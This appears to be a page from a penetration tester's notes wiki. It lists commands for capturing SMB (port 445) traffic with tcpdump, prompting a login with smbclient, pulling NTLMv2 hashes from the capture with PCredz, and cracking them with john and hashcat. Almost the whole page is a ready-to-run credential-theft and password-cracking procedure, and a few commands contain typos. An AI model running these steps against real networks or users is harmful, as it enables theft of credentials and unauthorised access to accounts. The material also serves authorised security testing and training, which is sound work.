Pull Hashes PCredz

PCredz

Will dig through files and grab hashes

capture:
> tcpdump -nv -s0 port 445 -w /tmp/winauth.pcap port 445
-s0 means grab-everything. more effective in older systems.

connect:
> smbclient //10.10.10.10/c$ Server1 -U bob

scan:
> cd /opt/PCredz/
> Pcredz -v -f /tmp/winauth.pcap

trim:
> cat CredentialsDump-Session.log
> grep bob CredentialsDump-Session.log | cut -d ' ' -f 5 | tee hash.txt
> cat hash.txt

crack:
> john hash.txt                       ..done!!
> hashcat -w 3 -a 0 -m 5600 hash.txt  ..done!!
cat ~./hashcat/hashcat.potfile

or: yuck like this:
hashcat -m 5600 --potfile-path ~/.hashcat/hashcat.potfile --show --outfile-format 2 hash.txt

PreviousMalware Analysis NextSSH PrivKey Passphrase

Last updated 1 year ago